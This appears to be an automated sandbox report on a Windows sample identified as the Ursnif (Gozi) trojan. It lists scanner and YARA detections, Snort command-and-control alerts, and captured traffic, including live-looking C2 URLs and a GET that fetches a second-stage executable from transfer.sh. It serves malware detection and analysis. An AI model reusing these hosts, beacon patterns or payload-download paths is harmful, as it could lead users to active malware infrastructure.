http://apr.intooltak.com/vlSm5FdhwFmMvT/YOr1y3vmv8eg4Ac3b7Y_2/BxNzh6No2PWjhu_2/Fyyb9C79h8hjmv0/0MJdM07T0vYSwv1YW8/_2F13x6Wl/Lrng4lSkMN3h4WUh3_2B/V0ttocBRKlq9AtXNAro/11M6x_2BaL1Zjx_2BWp4qX/FgWuexW_2FQbO/w_2FMf21/MXsR7_2BkMZgcjp0nVIxUlY/KUQNsPRxFs/f5vu_2BQoVI2fu6H_/2BIGCwdRzvbj/hz_2BIOSiZR/JFogKN88OOAHtb/M_2BNELxC21s15Johd0jZ/ulyOnBSm1PSraDUT/nl6kvDdqLoljmN_/2B2yicis3/ZYLr	true	Avira URL Cloud: malware	unknown

AV Detection:

Antivirus detection for URL or domain

Source: http://apr.intooltak.com/lnhNHa_2Btty8CaNj/2ZI6TN22qvUD/8ZPV4upYsm_/2FN7_2B_2BUcD0/ieoqnU4qUIxSEwBSH	Avira URL Cloud: Label: malware
Source: http://apr.intooltak.com/vlSm5FdhwFmMvT/YOr1y3vmv8eg4Ac3b7Y_2/BxNzh6No2PWjhu_2/Fyyb9C79h8hjmv0/0MJdM07T0vYSwv1YW8/_2F13x6Wl/Lrng4lSkMN3h4WUh3_2B/V0ttocBRKlq9AtXNAro/11M6x_2BaL1Zjx_2BWp4qX/FgWuexW_2FQbO/w_2FMf21/MXsR7_2BkMZgcjp0nVIxUlY/KUQNsPRxFs/f5vu_2BQoVI2fu6H_/2BIGCwdRzvbj/hz_2BIOSiZR/JFogKN88OOAHtb/M_2BNELxC21s15Johd0jZ/ulyOnBSm1PSraDUT/nl6kvDdqLoljmN_/2B2yicis3/ZYLr	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: gozi.exe	Virustotal: Detection: 38%	Perma Link
Source: gozi.exe	Metadefender: Detection: 40%	Perma Link
Source: gozi.exe	ReversingLabs: Detection: 65%

Antivirus / Scanner detection for submitted sample

Source: gozi.exe

Avira: detected

Machine Learning detection for sample

Source: gozi.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 8.0.RegAsm.exe.400000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.gozi.exe.32857b4.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 8.0.RegAsm.exe.400000.4.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.RegAsm.exe.400000.6.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.RegAsm.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.RegAsm.exe.400000.5.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.RegAsm.exe.400000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.RegAsm.exe.400000.7.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.gozi.exe.329b084.2.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 8.2.RegAsm.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.RegAsm.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

8_2_010A7479

Source: unknown

HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49743 version: TLS 1.2

Source: gozi.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Source:	Binary string: .C:\Users\user\AppData\Local\Temp\5n300s0s.pdbXP source: powershell.exe, 00000016.00000002.586031203.000002033C29E000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdb source: RegAsm.exe, 00000008.00000003.460334306.00000000044C0000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000003.467008744.0000000004570000.00000004.00000001.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\5n300s0s.pdb source: powershell.exe, 00000016.00000002.585929205.000002033C272000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: RegAsm.exe, 00000008.00000003.460334306.00000000044C0000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000003.467008744.0000000004570000.00000004.00000001.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\hscan34n.pdb source: powershell.exe, 00000016.00000002.585762448.000002033C236000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\5n300s0s.pdb source: powershell.exe, 00000016.00000003.533928373.000002035019D000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\New folder\bin\Debug\SLN\transport-manager\obj\Debug\transport-manager.pdb source: gozi.exe, gozi.exe, 00000002.00000000.285133625.0000000000E12000.00000002.00020000.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\hscan34n.pdbXP source: powershell.exe, 00000016.00000002.585929205.000002033C272000.00000004.00000001.sdmp
Source:	Binary string: EventManager.pdb source: gozi.exe, 00000002.00000002.328151243.0000000004199000.00000004.00000001.sdmp
Source:	Binary string: Local\{6FD9BC09-0238-7997-8413-56BDF8F7EA41}n.pdb source: powershell.exe, 00000016.00000003.533928373.000002035019D000.00000004.00000001.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

8_2_03F18409

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F1B9D4 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	8_2_03F1B9D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F0E91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	8_2_03F0E91D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F22ECF lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	8_2_03F22ECF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0303E91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	47_2_0303E91D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0304B9D4 FindFirstFileW,FindNextFileW,FindClose,FreeLibrary,	47_2_0304B9D4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_03052ECF memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,	47_2_03052ECF

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49751 -> 185.189.12.123:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49751 -> 185.189.12.123:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49752 -> 185.189.12.123:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49752 -> 185.189.12.123:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49754 -> 185.189.12.123:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49820 -> 185.189.12.123:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49820 -> 185.189.12.123:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe

Domain query: io.immontyr.com

Uses nslookup.exe to query domains

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

May check the online IP address of the machine

Source: C:\Windows\System32\nslookup.exe	DNS query: name: myip.opendns.com
Source: C:\Windows\System32\nslookup.exe	DNS query: name: myip.opendns.com

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /get/3dvhcv/lia.exe HTTP/1.1Host: transfer.shConnection: Keep-Alive

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /vlSm5FdhwFmMvT/YOr1y3vmv8eg4Ac3b7Y_2/BxNzh6No2PWjhu_2/Fyyb9C79h8hjmv0/0MJdM07T0vYSwv1YW8/_2F13x6Wl/Lrng4lSkMN3h4WUh3_2B/V0ttocBRKlq9AtXNAro/11M6x_2BaL1Zjx_2BWp4qX/FgWuexW_2FQbO/w_2FMf21/MXsR7_2BkMZgcjp0nVIxUlY/KUQNsPRxFs/f5vu_2BQoVI2fu6H_/2BIGCwdRzvbj/hz_2BIOSiZR/JFogKN88OOAHtb/M_2BNELxC21s15Johd0jZ/ulyOnBSm1PSraDUT/nl6kvDdqLoljmN_/2B2yicis3/ZYLr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic	HTTP traffic detected: GET /g37w_2FYO/KW18Y37P4Dg_2F1TMh_2/FK2ujRayUy6lspI6qOC/AgWOSVQoUjByibFH6VxOps/v3Ehdrv875bm_/2Bs0w7UO/8HLDir_2FrS7hQvf7_2F_2F/dRVLAAfuPh/m30EKXD6FtreycZoi/lobTM_2FcJdc/YK8geqpXCxP/dDLbqs1jlQyVsA/bp_2Fxijgc04UGfwb6H7A/hHd5lPMnnVOlY1xb/cpTKFIgzAGJyGab/7_2BPVHreJHJUQdZTy/CjJC9x69g/tFYle1uxB8JrgYxIiF_2/BMgOKImH_2BEsdbiTm7/xqsfHc14yTZglOas0gOCoM/8tPVx3GttAeuK/bZvFimTpFp_2B/LS HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic	HTTP traffic detected: GET /lnhNHa_2Btty8CaNj/2ZI6TN22qvUD/8ZPV4upYsm_/2FN7_2B_2BUcD0/ieoqnU4qUIxSEwBSHp3U9/VTOicK4Dg9CvfDD5/DOzqkKaYmXyqB_2/BBeVS9VS7cZ_2Bxp8N/QUqIP2qoG/d9YX0YxhQ9wrMxFsIM3_/2FpgIEySH_2F7iIla7P/RVB1W1dWGnBa303ekXLbS2/H9XWbOoIqxvpR/Y0oANlOz/wA_2FDoUg6f5pt9sPS8pXWN/S8nUx2g1cV/w178G4jzQvTUGix2J/FRZXUdQwbPuV/iCh6boYFIAo/eBnDiqYSbaisXu/CvhfCnnlGNsLFuBfY6dkH/EJQ5NM_2B10n/nvc8N HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic	HTTP traffic detected: GET /cG9R2yLu/hwY1VC7UV0FGuTFHUDuWv94/dWPB0qINsS/UcOtH5ibuFGkRtRRz/TcTs3WrbL3kk/KH9_2B01P5_/2BqOCU5VAuO8RX/tDtOsh5JefONIGFgJjwJW/WTNQ_2BigLNUfSTv/vEQOtss42jXAD7m/Vb_2FBrZFcmnzVx4eL/FgvV_2F2J/WJxkKD87XHV59J1BIptx/grHAayUrM6ZXOpWMd4b/m8CaZcQ61hUgT0Er2sN6yR/jqxJkoogaoGBQ/oxZTsR50/IU6qlhp0LlHnTmpxFkzazjn/ZXLdcjlESY/R9eDED1XHAy_2FpXA/QYirrLarjNjS/_2Faftuam8rF_2F/1Ew HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: io.immontyr.com
Source: global traffic	HTTP traffic detected: POST /NmtPFuQd_2/BfdLYLn2BLCtH1Hsh/hg_2FVLDGfIg/gtHnWY07UvK/_2FGfiZdkTNp3n/qSVe2e02NbQuSngndCWZx/FHtx2JyPoVSWyJAF/Nf3MxwobjdKHeJw/QN32g1hXKaTKdLZpGQ/1rai86tHa/cARCkcyc0ZIXwpr6o7hy/9LscnpzGSQw_2BN65St/d5vH28LuyC5fwk6W58_2BJ/mW_2BjaYyboIc/4qfAAbea/H6DnQT_2FBDJuaMwLw_2Bis/Q5vm9_2Bsb/WNMn_2Bg9zRAyx8QD/EwO5ty_2BWJe/AeEgVlXP8KP/mEQSv1dRw/v0fxMe2Myiu1T/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Content-Length: 2Host: io.immontyr.com

Source: RegAsm.exe, 00000008.00000003.412693608.0000000000E93000.00000004.00000001.sdmp	String found in binary or memory: http://apr.intooltak.com/lnhNHa_2Btty8CaNj/2ZI6TN22qvUD/8ZPV4upYsm_/2FN7_2B_2BUcD0/ieoqnU4qUIxSEwBSH
Source: RegAsm.exe, 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000002.544075134.000001DC0EF2C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: RegAsm.exe, 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000002.544075134.000001DC0EF2C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: RegAsm.exe, 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000002.544075134.000001DC0EF2C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: RuntimeBroker.exe, 00000029.00000000.607858316.00000163C251B000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.cmgR
Source: RuntimeBroker.exe, 00000029.00000000.607858316.00000163C251B000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.ux2
Source: RuntimeBroker.exe, 00000029.00000000.607858316.00000163C251B000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobp/
Source: RuntimeBroker.exe, 00000029.00000000.607858316.00000163C251B000.00000004.00000001.sdmp	String found in binary or memory: http://ns.micro/1
Source: powershell.exe, 00000016.00000002.586306503.0000020347CCF000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000016.00000002.538900728.0000020337E6A000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: gozi.exe, 00000002.00000002.328014285.00000000031F4000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.537650333.0000020337C61000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: gozi.exe, 00000002.00000002.328074082.0000000003263000.00000004.00000001.sdmp	String found in binary or memory: http://transfer.sh
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000016.00000002.538900728.0000020337E6A000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: powershell.exe, 00000016.00000002.586306503.0000020347CCF000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000016.00000002.586306503.0000020347CCF000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000016.00000002.586306503.0000020347CCF000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000016.00000002.538900728.0000020337E6A000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000016.00000002.586306503.0000020347CCF000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: gozi.exe, 00000002.00000002.328014285.00000000031F4000.00000004.00000001.sdmp	String found in binary or memory: https://transfer.sh
Source: gozi.exe, 00000002.00000002.328014285.00000000031F4000.00000004.00000001.sdmp	String found in binary or memory: https://transfer.sh/get/3dvhcv/lia.exe
Source: gozi.exe, 00000002.00000002.328014285.00000000031F4000.00000004.00000001.sdmp	String found in binary or memory: https://transfer.sh4jl

Source: unknown

DNS traffic detected: queries for: transfer.sh

Source: global traffic	HTTP traffic detected: GET /get/3dvhcv/lia.exe HTTP/1.1Host: transfer.shConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /vlSm5FdhwFmMvT/YOr1y3vmv8eg4Ac3b7Y_2/BxNzh6No2PWjhu_2/Fyyb9C79h8hjmv0/0MJdM07T0vYSwv1YW8/_2F13x6Wl/Lrng4lSkMN3h4WUh3_2B/V0ttocBRKlq9AtXNAro/11M6x_2BaL1Zjx_2BWp4qX/FgWuexW_2FQbO/w_2FMf21/MXsR7_2BkMZgcjp0nVIxUlY/KUQNsPRxFs/f5vu_2BQoVI2fu6H_/2BIGCwdRzvbj/hz_2BIOSiZR/JFogKN88OOAHtb/M_2BNELxC21s15Johd0jZ/ulyOnBSm1PSraDUT/nl6kvDdqLoljmN_/2B2yicis3/ZYLr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic	HTTP traffic detected: GET /g37w_2FYO/KW18Y37P4Dg_2F1TMh_2/FK2ujRayUy6lspI6qOC/AgWOSVQoUjByibFH6VxOps/v3Ehdrv875bm_/2Bs0w7UO/8HLDir_2FrS7hQvf7_2F_2F/dRVLAAfuPh/m30EKXD6FtreycZoi/lobTM_2FcJdc/YK8geqpXCxP/dDLbqs1jlQyVsA/bp_2Fxijgc04UGfwb6H7A/hHd5lPMnnVOlY1xb/cpTKFIgzAGJyGab/7_2BPVHreJHJUQdZTy/CjJC9x69g/tFYle1uxB8JrgYxIiF_2/BMgOKImH_2BEsdbiTm7/xqsfHc14yTZglOas0gOCoM/8tPVx3GttAeuK/bZvFimTpFp_2B/LS HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic	HTTP traffic detected: GET /lnhNHa_2Btty8CaNj/2ZI6TN22qvUD/8ZPV4upYsm_/2FN7_2B_2BUcD0/ieoqnU4qUIxSEwBSHp3U9/VTOicK4Dg9CvfDD5/DOzqkKaYmXyqB_2/BBeVS9VS7cZ_2Bxp8N/QUqIP2qoG/d9YX0YxhQ9wrMxFsIM3_/2FpgIEySH_2F7iIla7P/RVB1W1dWGnBa303ekXLbS2/H9XWbOoIqxvpR/Y0oANlOz/wA_2FDoUg6f5pt9sPS8pXWN/S8nUx2g1cV/w178G4jzQvTUGix2J/FRZXUdQwbPuV/iCh6boYFIAo/eBnDiqYSbaisXu/CvhfCnnlGNsLFuBfY6dkH/EJQ5NM_2B10n/nvc8N HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic	HTTP traffic detected: GET /cG9R2yLu/hwY1VC7UV0FGuTFHUDuWv94/dWPB0qINsS/UcOtH5ibuFGkRtRRz/TcTs3WrbL3kk/KH9_2B01P5_/2BqOCU5VAuO8RX/tDtOsh5JefONIGFgJjwJW/WTNQ_2BigLNUfSTv/vEQOtss42jXAD7m/Vb_2FBrZFcmnzVx4eL/FgvV_2F2J/WJxkKD87XHV59J1BIptx/grHAayUrM6ZXOpWMd4b/m8CaZcQ61hUgT0Er2sN6yR/jqxJkoogaoGBQ/oxZTsR50/IU6qlhp0LlHnTmpxFkzazjn/ZXLdcjlESY/R9eDED1XHAy_2FpXA/QYirrLarjNjS/_2Faftuam8rF_2F/1Ew HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: io.immontyr.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443

Source: unknown

HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49743 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Source: Yara match	File source: 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392490032.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672226246.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671882459.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392591901.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671987567.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392517903.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672047552.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392607938.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671936053.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473486452.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.540930276.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392570642.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672143247.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473394409.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.541170125.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473504593.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.405030349.000000000320C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392542209.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.395416668.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672170468.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000002.673705435.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5696, type: MEMORYSTR
